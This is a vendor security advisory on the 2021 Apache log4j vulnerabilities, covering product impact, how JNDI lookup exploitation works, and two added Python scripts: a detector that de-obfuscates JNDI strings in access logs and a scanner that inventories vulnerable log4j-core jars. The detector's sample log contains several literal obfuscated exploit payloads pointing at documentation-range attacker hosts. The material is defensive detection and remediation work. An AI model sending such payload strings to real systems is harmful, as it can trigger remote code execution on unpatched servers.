Updated: Dec 18, 2021
On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache log4j 2, CVE-2021-44228, was disclosed and fixed in log4j v2.15.0; attackers were already actively exploiting it. On Dec. 14, 2021, a second vulnerability, CVE-2021-45046, was announced and fixed in log4j v2.16.0 (Java 8) and v2.12.2 (Java 7). A third vulnerability, CVE-2021-45105, was announced and fixed in log4j v2.17.0.
Netsurion’s EventTracker v9 core code does not use the Apache log4j library. Our analysis shows no components of EventTracker v9.3 are affected by this vulnerability.
Note: EventTracker v9.3 incorporates ElasticSearch v7.2.1. A scan of the installation will show Program Files\Elasticsearch-7.2.1\lib\log4j-core-2.11.1.jar, which version-matching scanners will flag as vulnerable. Our analysis is that this instance is not exploitable and does not require urgent remediation. Version-matching scanners cannot tell whether the JNDI lookup path is actually reachable, so treat the hit as a false positive only after checking it against Elastic's own advisory for the installed Elasticsearch version.
Netsurion’s proprietary BranchSDO CXD platform also does not use Apache log4j and is therefore unaffected. However, other third-party hardware managed by Netsurion may be affected. We are awaiting full analysis from each respective vendor and will address any vulnerabilities as they are identified.
A.N. Ananth, President and Chief Strategy Officer, explains the background, context and consequences of this exploit, and the appropriate steps to defend against it.
Updated information on mitigation techniques.
A.N. Ananth, President and Chief Strategy Officer, demonstrates how the Netsurion Managed Threat Protection service predicts, prevents, and detects attacks on vulnerable log4j instances in your monitored network.
Apache log4j 2 is an open-source Java logging framework used by a very large number of Java applications. Developers use it to log arbitrary data from within their application, and in many cases that data originates from user input (an HTTP header, a username, a form field). Log4j 2 supports lookups: `${...}` expressions that are expanded while a log message is being formatted. If user input containing a JNDI lookup (for example `${jndi:ldap://<attacker host>/a}`) is logged by a vulnerable version, log4j performs the lookup: it connects to the attacker-controlled LDAP (or RMI) server named in the string, that server can return a reference to a remote Java class, and the victim's JVM loads and executes that class. The result is RCE on the server running the vulnerable log4j 2 instance.
Public proof-of-concept (PoC) code was released quickly, and subsequent investigation showed that exploitation is easy: by submitting a specially crafted request to a vulnerable system, an attacker can, depending on how the system is configured, instruct it to download and execute a malicious payload. Because the disclosure is so recent, many servers, both on-premises and in cloud environments, have yet to be patched, and, as with many high-severity RCE vulnerabilities, mass scanning for CVE-2021-44228 began across the internet almost immediately to find and exploit unpatched systems.
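The crafted requests described above rarely arrive as a plain `${jndi:ldap://...}` string; scanners URL-encode them and hide the word "jndi" behind nested lookups such as `${lower:j}` or `${::-j}`. The following Python script is an added example (not Netsurion's code and not part of the original advisory) of the normalization a detection rule needs before it can match: it URL-decodes each log line, collapses the common obfuscation lookups the way log4j itself would, and then matches the de-obfuscated JNDI lookup. The access-log lines are constructed sample data, and the 203.0.113.x / 198.51.100.x addresses are documentation ranges.

```python
import re
from urllib.parse import unquote

# Innermost lookups (no further "${" inside) that attackers use only to hide the
# literal "jndi" from naive string matching. Variants handled here:
#   ${::-j}        -> "j"   empty lookup with default value "j"
#   ${lower:J}     -> "j"
#   ${upper:j}     -> "J"
#   ${env:NOPE:-j} -> "j"   undefined variable falls back to the default "j"
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.I)


def _resolve(match):
    """Resolve one innermost lookup the way log4j would, or leave it untouched."""
    body = match.group(1)
    if body.startswith("::-"):
        return body[3:]
    kind, _, rest = body.partition(":")
    kind = kind.lower()
    if kind == "lower":
        return rest.lower()
    if kind == "upper":
        return rest.upper()
    if ":-" in rest:                       # env:X:-j, sys:X:-j, ...
        return rest.split(":-", 1)[1]
    return match.group(0)                  # e.g. ${jndi:...} itself stays as-is


def normalize(text, max_rounds=20):
    """Undo URL encoding and collapse nested lookups until nothing changes."""
    for _ in range(3):                     # double/triple encoding is common
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        expanded = _INNER.sub(_resolve, text)
        if expanded == text:
            break
        text = expanded
    return text


def find_jndi(text):
    """Return the de-obfuscated JNDI lookup found in text, or None."""
    norm = normalize(text)
    m = _JNDI.search(norm)
    if not m:
        return None
    end = norm.find("}", m.start())
    return norm[m.start():end + 1] if end != -1 else norm[m.start():]


def scan_log(log_text):
    """Return (line_no, client_ip, payload) for every line carrying a JNDI lookup."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        payload = find_jndi(line)
        if payload:
            hits.append((line_no, line.split()[0], payload))
    return hits


# Constructed sample web-server access log: plain, nested-lookup, URL-encoded and
# case-obfuscated payloads in the User-Agent or query string, plus one benign line.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"
203.0.113.7 - - [10/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.9:1389/a}"
203.0.113.7 - - [10/Dec/2021:03:14:11 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fobj%7D HTTP/1.1" 404 128 "-" "curl/7.68.0"
198.51.100.4 - - [10/Dec/2021:03:15:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Dec/2021:03:15:30 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.9/x}"
"""

if __name__ == "__main__":
    for line_no, ip, payload in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {ip} -> {payload}")
```

Run it against any field an application might log, not just the User-Agent (X-Forwarded-For, usernames, form bodies). The normalization is a heuristic covering the obfuscations seen in mass scanning, not a reimplementation of log4j's lookup engine, so corroborate hits with outbound LDAP, RMI or unexpected DNS traffic from the application servers.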
Affected versions: Apache Log4j 2.x up to and including 2.15.0-rc1 (CVE-2021-44228); 2.15.0 remains affected by CVE-2021-45046 and 2.16.0 by CVE-2021-45105.
Apache has released 2.17.0 (for Java 8 and up), which addresses CVE-2021-44228, CVE-2021-45046 and CVE-2021-45105; the equivalent backports are 2.12.3 for Java 7 and 2.3.1 for Java 6.
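Turning the version list above and the Elasticsearch note earlier on this page into a concrete finding means inventorying every log4j-core jar on a host, including jars nested inside .war/.ear files and copies whose JndiLookup.class has already been deleted (the mitigation Apache documents for installations that cannot upgrade; the earlier `formatMsgNoLookups` setting was shown insufficient by CVE-2021-45046). The script below is an added example in Python, not Netsurion's tooling: it walks a directory tree, reads the version from each jar's pom.properties (falling back to the file name), classifies it against the three CVEs, and recurses into nested archives. The install tree it builds is a constructed fixture with stub jars that merely mimics the path named in the Elasticsearch note; no real Elasticsearch files are involved.

```python
import io
import os
import re
import tempfile
import zipfile

# Release in which each CVE was fixed on the main (Java 8+) log4j 2.x line.
FIXED_IN = {"CVE-2021-44228": (2, 15, 0), "CVE-2021-45046": (2, 16, 0), "CVE-2021-45105": (2, 17, 0)}
# Backports for older JVMs: 2.12.2 (Java 7) fixed the first two CVEs only;
# 2.12.3 (Java 7) and 2.3.1 (Java 6) carry all three fixes.
BACKPORTS = {(2, 12, 2): ["CVE-2021-45105"], (2, 12, 3): [], (2, 3, 1): []}
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
_VER_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-?(rc\d+|beta\d+))?", re.I)


def parse_version(text):
    """'2.11.1' -> (2, 11, 1, 1); '2.15.0-rc1' -> (2, 15, 0, 0).
    The trailing flag is 0 for pre-releases so 2.15.0-rc1 sorts below 2.15.0."""
    m = _VER_RE.search(text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0), 0 if m.group(4) else 1)


def outstanding_cves(version):
    """CVEs for which a log4j-core of this version carries no fix."""
    if version is None:
        return list(FIXED_IN)          # unknown build: treat as unpatched, inspect by hand
    if version[3] == 1 and version[:3] in BACKPORTS:
        return list(BACKPORTS[version[:3]])
    return [cve for cve, fixed in FIXED_IN.items() if version < fixed + (1,)]


def _inspect(zf, path, findings):
    """Record zf if it is log4j-core (by name, pom.properties, or the JndiLookup
    class for shaded copies), then recurse into any archive nested inside it."""
    names = sorted(zf.namelist())
    base = os.path.basename(path.split("!/")[-1]).lower()
    if base.startswith("log4j-core") or POM_PROPS in names or JNDI_CLASS in names:
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = parse_version(line[len("version="):])
        if version is None and base.startswith("log4j-core"):
            version = parse_version(base)
        findings.append({
            "path": path,
            "version": version,
            "outstanding": outstanding_cves(version),
            # If JndiLookup.class has been deleted, the lookup cannot fire regardless of version.
            "jndi_lookup_present": JNDI_CLASS in names,
        })
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    _inspect(inner, f"{path}!/{name}", findings)
            except zipfile.BadZipFile:
                pass


def scan_tree(root):
    """Walk root and return one finding per log4j-core found, nested or not."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(full) as zf:
                        _inspect(zf, full, findings)
                except zipfile.BadZipFile:
                    pass
    return findings


def _fake_jar(version, with_jndi=True):
    """Constructed stand-in for a log4j-core jar: pom.properties plus a class-file stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if with_jndi:
            z.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return buf.getvalue()


def demo():
    """Build a constructed install tree (not real Elasticsearch files) and scan it."""
    with tempfile.TemporaryDirectory() as root:
        lib = os.path.join(root, "Elasticsearch-7.2.1", "lib")
        os.makedirs(lib)
        with open(os.path.join(lib, "log4j-core-2.11.1.jar"), "wb") as fh:
            fh.write(_fake_jar("2.11.1"))                   # the jar named in the note above
        with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
            war.writestr("WEB-INF/lib/log4j-core-2.17.0.jar", _fake_jar("2.17.0"))
        with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as fh:
            fh.write(_fake_jar("2.14.1", with_jndi=False))  # class removed: mitigated
        return {os.path.basename(r["path"]): (r["version"], r["outstanding"], r["jndi_lookup_present"])
                for r in scan_tree(root)}


if __name__ == "__main__":
    for name, (version, cves, jndi) in demo().items():
        print(f"{name}: version={version} outstanding={cves} JndiLookup.class present={jndi}")
```

Point `scan_tree` at the application roots on a real host (the Program Files tree for a Windows EventTracker install, /opt or /usr/share for Linux services). Log4j 1.x jars are out of scope for these three CVEs and are not matched; a jar reported with all three CVEs outstanding but `jndi_lookup_present` False has had the documented class-removal mitigation applied.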
CVE-2021-44228 is still being actively investigated to establish its full scope and severity. Given the information currently available, it has a high impact now and will continue to in the near future, because many of the affected applications are widely used in corporate networks. Users are encouraged to take all necessary steps to ensure they are protected against this vulnerability.